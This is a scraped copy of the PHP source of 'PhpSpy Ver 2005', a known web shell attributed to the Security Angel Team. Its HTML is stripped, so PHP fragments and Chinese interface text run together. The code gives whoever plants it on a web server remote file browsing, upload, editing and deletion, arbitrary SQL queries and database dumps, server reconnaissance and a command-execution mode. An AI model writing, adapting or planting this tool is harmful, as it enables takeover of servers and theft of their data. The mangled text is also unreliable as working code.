"; echo "注销成功......

三秒后自动退出或单击这里退出程序界面>>>"; exit; } if ($login) { $adminpass=trim($_POST['adminpass']); if ($adminpass==$admin['pass']) { $_SESSION['adminpass'] = $admin['pass']; echo ""; echo "登陆成功......

三秒后自动跳转或单击这里进入程序界面>>>"; exit; } } if (session_is_registered('adminpass')) { if ($_SESSION['adminpass']!=$admin['pass']) { loginpage(); } } else { loginpage(); } } else { /*------- cookie 验证 -------*/ if ($_GET['action'] == "logout") { setcookie ("adminpass", ""); echo ""; echo "注销成功......

三秒后自动退出或单击这里退出程序界面>>>"; exit; } if ($login) { $adminpass=trim($_POST['adminpass']); if ($adminpass==$admin['pass']) { setcookie ("adminpass",$admin['pass'],time()+(1*24*3600)); echo ""; echo "登陆成功......

三秒后自动跳转或单击这里进入程序界面>>>"; exit; } } if (isset($_COOKIE['adminpass'])) { if ($_COOKIE['adminpass']!=$admin['pass']) { loginpage(); } } else { loginpage(); } } }//end check /*===================== 验证结束 =====================*/ // 判断 magic_quotes_gpc 状态 if (get_magic_quotes_gpc()) { $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); } if ($_GET['action'] == "phpinfo") { $dis_func = get_cfg_var("disable_functions"); echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>"; exit; } // 下载文件 if (!empty($downfile)) { if (!@file_exists($downfile)) { echo ""; } else { $filename = basename($downfile); $filename_info = explode('.', $filename); $fileext = $filename_info[count($filename_info)-1]; header('Content-type: application/x-'.$fileext); header('Content-Disposition: attachment; filename='.$filename); header('Content-Description: PHP Generated Data'); header('Content-Length: '.filesize($downfile)); @readfile($downfile); exit; } } // 程序目录 $pathname=str_replace('\\','/',dirname(__FILE__)); // 获取当前路径 if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_GET['dir']; $nowpath = getPath($pathname, $dir); } // 判断读写情况 if (dir_writeable($nowpath)) { $dir_writeable = "可写"; } else { $dir_writeable = "不可写"; } $dis_func = get_cfg_var("disable_functions"); $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; $shellmode=(!get_cfg_var("safe_mode")) ? " | WebShell" : ""; ?> PhpSpy Ver 2005

:
注销会话 | 返回 PhpSpy 目录 | PHP环境变量 | SQL Query | MySQL Backup | Version 2005

程序路径:
当前目录(,):
跳转目录: 〖支持绝对路径和相对路径〗

上传文件到当前目录:
新建文件在当前目录:
新建目录在当前目录:
\n"; // 删除文件 if(@$delfile!="") { if(file_exists($delfile)) { if (@unlink($delfile)) { echo "".$delfile." 删除成功!"; } else { echo "文件删除失败!"; } } else { echo "文件已不存在,删除失败!"; } } // 删除目录 elseif($rmdir) { if($deldir!="") { $deldirs="$dir/$deldir"; if(!file_exists("$deldirs")) { echo "目录已不存在!"; } else { deltree($deldirs); } } else { echo "删除失败!"; } } // 创建目录 elseif($createdirectory) { if(!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if(file_exists("$mkdirs")) { echo "该目录已存在!"; } else { echo $msg=@mkdir("$mkdirs",0777) ? "创建目录成功!" : "创建失败!"; @chmod("$mkdirs",0777); } } } // 上传文件 elseif($uploadfile) { echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!"; } // 编辑文件 elseif($doeditfile) { $filename="$editfilename"; @$fp=fopen("$filename","w"); echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!"; @fclose($fp); } // 编辑文件属性 elseif($editfileperm) { $fileperm=base_convert($_POST['fileperm'],8,10); echo $msg=@chmod($dir."/".$file,$fileperm) ? "属性修改成功!" : "修改失败!"; echo " [".$file."] 修改后的属性为:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4).""; } // 连接MYSQL elseif($connect) { if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { echo "数据库连接成功!"; mysql_close(); } else { echo mysql_error(); } } // 执行SQL语句 elseif($doquery) { @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); @mysql_select_db($dbname) or die("选择数据库失败"); $result = @mysql_query($_POST['sql_query']); echo ($result) ? "SQL语句成功执行" : "出错: ".mysql_error(); mysql_close(); } // 备份操作 elseif ($dobackup) { if (empty($_POST[table])) { echo "请选择欲备份的数据表"; } else { @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); @mysql_select_db($dbname) or die("选择数据库失败"); $table = array_flip($_POST[table]); $filehandle = @fopen($path,"w"); if ($filehandle) { $result = mysql_query("SHOW tables"); echo ($result) ? NULL : "出错: ".mysql_error(); while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $filehandle); fwrite($filehandle,"\n\n\n"); } } fclose($filehandle); echo "数据库已成功备份到 ".$path.""; mysql_close(); } else { echo "备份失败,请确认目标文件夹是否具有可写权限."; } } } // 打包下载 PS:文件太大可能非常慢 // Thx : 小花 elseif($downrar) { if ($dl != "") { $dfiles=""; foreach ($dl AS $filepath=>$value) { $dfiles.=$filepath.","; } $dfiles=substr($dfiles,0,strlen($dfiles)-1); $dl=explode(",",$dfiles); $zip=new PHPZip($dl); $code=$zip->out; $filename=$_POST['rarfile']; header("Content-type: application/octet-stream"); header("Accept-Ranges: bytes"); header("Accept-Length: ".strlen($code)); header("Content-Disposition: attachment;filename=".$filename); echo $code; exit; } else { echo "请选择要打包下载的文件."; } } // 查看PHP配置参数状况 elseif($viewphpvar) { echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname']).""; } else { echo "本程序由 Security Angel 小组 angel [BST] 独立开发,可在 www.4ngel.net 下载最新版本."; } echo "

\n"; /*===================== 执行操作 结束 =====================*/ if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { ?> \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo "\n"; $dir_i++; } else { if($file=="..") { echo "\n"; echo " \n"; echo "\n"; } } } }//while @closedir($dirs); ?> ".@date("Y-m-d H:i:s",@filectime($filepath)).""; $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; } @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); echo "\n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo "\n"; $file_i++; } } @closedir($dirs); ?>
文件 创建日期 最后修改 大小 属性 操作
[$file]$ctime$mtime<dir>$dirperm删除
返回上级目录
$file$ctime$mtime$size KB$fileperm下载 | 编辑 | 删除
个目录 / 个文件
新建/编辑文件 [返回]
当前文件: 输入新文件名则建立新文件
WebShell Mode
提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.
选择执行函数:   输入命令:

Safe_Mode 已打开, 无法执行系统命令.

删除 目录
注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?
修改文件属性 [返回]
的属性为: " class="input">
执行 SQL 语句
Host: User: Pass: DB:
\n"; echo " \n"; echo "\n"; } else { ?> \n"; echo "
备份 MySQL 数据库
Host: User: Pass: DB:
您没有连接数据库 or 当前数据库没有任何数据表
请选择表:
备份数据所保存的路径:
\n"; @mysql_close(); }//end sql backup elseif ($_GET['action'] == "phpenv") { $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; $dis_func = get_cfg_var("disable_functions"); if ($dis_func == "") { $dis_func = "No"; }else { $dis_func = str_replace(" ","
",$dis_func); $dis_func = str_replace(",","
",$dis_func); } $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info[0] = array("服务器时间",date("Y年m月d日 h:i:s",time())); $info[1] = array("服务器域名","$_SERVER[SERVER_NAME]"); $info[2] = array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])); $info[3] = array("服务器操作系统",PHP_OS); $info[5] = array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']); $info[6] = array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']); $info[7] = array("Web服务端口",$_SERVER['SERVER_PORT']); $info[8] = array("PHP运行方式",strtoupper(php_sapi_name())); $info[9] = array("PHP版本",PHP_VERSION); $info[10] = array("运行于安全模式",getphpcfg("safemode")); $info[11] = array("服务器管理员",$adminmail); $info[12] = array("本文件路径",__FILE__); $info[13] = array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")); $info[14] = array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")); $info[15] = array("显示错误信息 display_errors",getphpcfg("display_errors")); $info[16] = array("自动定义全局变量 register_globals",getphpcfg("register_globals")); $info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")); $info[18] = array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")); $info[19] = array("POST最大字节数 post_max_size",getphpcfg("post_max_size")); $info[20] = array("允许最大上传文件 upload_max_filesize",$upsize); $info[21] = array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"); $info[22] = array("被禁用的函数 disable_functions",$dis_func); $info[23] = array("phpinfo()",$phpinfo); $info[24] = array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'); $info[25] = array("图形处理 GD Library",getfun("imageline")); $info[26] = array("IMAP电子邮件系统",getfun("imap_close")); $info[27] = array("MySQL数据库",getfun("mysql_close")); $info[28] = array("SyBase数据库",getfun("sybase_close")); $info[29] = array("Oracle数据库",getfun("ora_close")); $info[30] = array("Oracle 8 数据库",getfun("OCILogOff")); $info[31] = array("PREL相容语法 PCRE",getfun("preg_match")); $info[32] = array("PDF文档支持",getfun("pdf_close")); $info[33] = array("Postgre SQL数据库",getfun("pg_close")); $info[34] = array("SNMP网络管理协议",getfun("snmpget")); $info[35] = array("压缩文件支持(Zlib)",getfun("gzclose")); $info[36] = array("XML解析",getfun("xml_set_object")); $info[37] = array("FTP",getfun("ftp_login")); $info[38] = array("ODBC数据库连接",getfun("odbc_close")); $info[39] = array("Session支持",getfun("session_start")); $info[40] = array("Socket支持",getfun("fsockopen")); ?> "; }//end phpenv ?>
查看PHP配置参数状况
请输入配置参数(如:magic_quotes_gpc):
\n"; } }elseif($a == 1){ for($i=13;$i<=24;$i++){ echo "\n"; } }elseif($a == 2){ for($i=25;$i<=40;$i++){ echo "\n"; } } ?>
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.
Password:
read()) { if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { @chmod("$deldir/$file",0777); deltree("$deldir/$file"); } if (is_file("$deldir/$file")) { @chmod("$deldir/$file",0777); @unlink("$deldir/$file"); } } $mydir->close(); @chmod("$deldir",0777); echo @rmdir($deldir) ? "目录删除成功!" : "目录删除失败!"; } // 判断读写情况 function dir_writeable($dir) { if (!is_dir($dir)) { @mkdir($dir, 0777); } if(is_dir($dir)) { if ($fp = @fopen("$dir/test.txt", 'w')) { @fclose($fp); @unlink("$dir/test.txt"); $writeable = 1; } else { $writeable = 0; } } return $writeable; } // 表格行间的背景色替换 function getrowbg() { global $bgcounter; if ($bgcounter++%2==0) { return "firstalt"; } else { return "secondalt"; } } // 获取当前的文件系统路径 function getPath($mainpath, $relativepath) { global $dir; $mainpath_info = explode('/', $mainpath); $relativepath_info = explode('/', $relativepath); $relativepath_info_count = count($relativepath_info); for ($i=0; $i<$relativepath_info_count; $i++) { if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; if ($relativepath_info[$i] == '..') { $mainpath_info_count = count($mainpath_info); unset($mainpath_info[$mainpath_info_count-1]); continue; } $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; } //end for return implode('/', $mainpath_info); } // 检查PHP配置参数 function getphpcfg($varname) { switch($result = get_cfg_var($varname)) { case 0: return No; break; case 1: return Yes; break; default: return $result; break; } } // 检查函数情况 function getfun($funName) { return (false !== function_exists($funName)) ? Yes : No; } // 压缩打包类 class PHPZip{ var $out=''; function PHPZip($dir, $zipfilename="") { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir);//文件列表 foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, "r"); $content = @fread ($fd, filesize ($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); // 下面将生成的内容$out写入文件,如果需要在服务器生成压缩包,请去掉注释 /*$fp = fopen($zipfilename, "w"); fwrite($fp, $this->out, strlen($this->out)); fclose($fp); */ } return 1; } else return 0; } // 获得指定目录文件列表 function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } // end if return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } // 备份数据库 function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = mysql_query("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } mysql_free_result($fields); $keys = mysql_query("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = mysql_query("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } } mysql_free_result($rows); } ?>